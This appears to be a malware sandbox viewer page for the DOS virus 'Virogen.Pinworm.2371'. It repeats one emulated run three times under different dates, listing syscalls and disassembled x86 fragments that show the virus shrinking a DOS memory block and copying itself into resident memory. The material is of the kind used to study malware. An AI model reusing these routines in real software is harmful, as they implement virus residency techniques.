Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2371

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:34:57.048145654Z 250 PC: 12b25 | UNKNOWN!
2018-12-17T22:34:57.049449405Z 42 PC: 12b2d | Get date 0x12b2d: cmp dl, 0xd
0x12b30: jne 0x12b38
0x12b32: mov byte ptr cs:[bp + 0x71a], 1
0x12b38: mov ax, es
0x12b3a: dec ax
0x12b3b: mov ds, ax
0x12b3d: cmp byte ptr [0], 0x5a
0x12b42: jne 0x12b89
0x12b44: sub word ptr [3], 0x180
0x12b4a: sub word ptr [0x12], 0x180
0x12b50: mov es, word ptr [0x12]
0x12b54: push cs
0x12b55: pop ds
0x12b56: mov si, bp
0x12b58: mov cx, 0x430
0x12b5b: xor di, di
0x12b5d: rep movsd dword ptr es:[di], dword ptr [si]
0x12b5f: xor ax, ax
0x12b61: mov ds, ax
0x12b63: push ds
2018-12-17T22:34:57.050983381Z 44 PC: 12ff0 | Get time 0x12ff0: mov word ptr [0x721], dx
0x12ff4: pop ax
0x12ff5: ret
0x12ff6: push ax
0x12ff7: mov ax, word ptr [0x721]
0x12ffa: mov cx, 0x7ab5
0x12ffd: mul cx
0x12fff: add ax, 0x3619
0x13002: mov word ptr [0x721], ax
0x13005: pop cx
0x13006: mul cx
0x13008: cmp dx, 0
0x1300b: jne 0x1300e
0x1300d: inc dx
0x1300e: ret
0x1300f: inc bx
0x13010: dec ax
0x13011: dec bx
0x13012: dec sp
0x13013: dec cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6260,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:59.262758182Z 250 PC: 12b25 | UNKNOWN!
2018-12-25T11:58:59.264602504Z 42 PC: 12b2d | Get date 0x12b2d: cmp dl, 0xd
0x12b30: jne 0x12b38
0x12b32: mov byte ptr cs:[bp + 0x71a], 1
0x12b38: mov ax, es
0x12b3a: dec ax
0x12b3b: mov ds, ax
0x12b3d: cmp byte ptr [0], 0x5a
0x12b42: jne 0x12b89
0x12b44: sub word ptr [3], 0x180
0x12b4a: sub word ptr [0x12], 0x180
0x12b50: mov es, word ptr [0x12]
0x12b54: push cs
0x12b55: pop ds
0x12b56: mov si, bp
0x12b58: mov cx, 0x430
0x12b5b: xor di, di
0x12b5d: rep movsd dword ptr es:[di], dword ptr [si]
0x12b5f: xor ax, ax
0x12b61: mov ds, ax
0x12b63: push ds
2018-12-25T11:58:59.267100232Z 44 PC: 12ff0 | Get time 0x12ff0: mov word ptr [0x721], dx
0x12ff4: pop ax
0x12ff5: ret
0x12ff6: push ax
0x12ff7: mov ax, word ptr [0x721]
0x12ffa: mov cx, 0x7ab5
0x12ffd: mul cx
0x12fff: add ax, 0x3619
0x13002: mov word ptr [0x721], ax
0x13005: pop cx
0x13006: mul cx
0x13008: cmp dx, 0
0x1300b: jne 0x1300e
0x1300d: inc dx
0x1300e: ret
0x1300f: inc bx
0x13010: dec ax
0x13011: dec bx
0x13012: dec sp
0x13013: dec cx

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6260,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:00.802016437Z 250 PC: 12b25 | UNKNOWN!
2018-12-25T11:59:00.802982922Z 42 PC: 12b2d | Get date 0x12b2d: cmp dl, 0xd
0x12b30: jne 0x12b38
0x12b32: mov byte ptr cs:[bp + 0x71a], 1
0x12b38: mov ax, es
0x12b3a: dec ax
0x12b3b: mov ds, ax
0x12b3d: cmp byte ptr [0], 0x5a
0x12b42: jne 0x12b89
0x12b44: sub word ptr [3], 0x180
0x12b4a: sub word ptr [0x12], 0x180
0x12b50: mov es, word ptr [0x12]
0x12b54: push cs
0x12b55: pop ds
0x12b56: mov si, bp
0x12b58: mov cx, 0x430
0x12b5b: xor di, di
0x12b5d: rep movsd dword ptr es:[di], dword ptr [si]
0x12b5f: xor ax, ax
0x12b61: mov ds, ax
0x12b63: push ds
2018-12-25T11:59:00.807102678Z 44 PC: 12ff0 | Get time 0x12ff0: mov word ptr [0x721], dx
0x12ff4: pop ax
0x12ff5: ret
0x12ff6: push ax
0x12ff7: mov ax, word ptr [0x721]
0x12ffa: mov cx, 0x7ab5
0x12ffd: mul cx
0x12fff: add ax, 0x3619
0x13002: mov word ptr [0x721], ax
0x13005: pop cx
0x13006: mul cx
0x13008: cmp dx, 0
0x1300b: jne 0x1300e
0x1300d: inc dx
0x1300e: ret
0x1300f: inc bx
0x13010: dec ax
0x13011: dec bx
0x13012: dec sp
0x13013: dec cx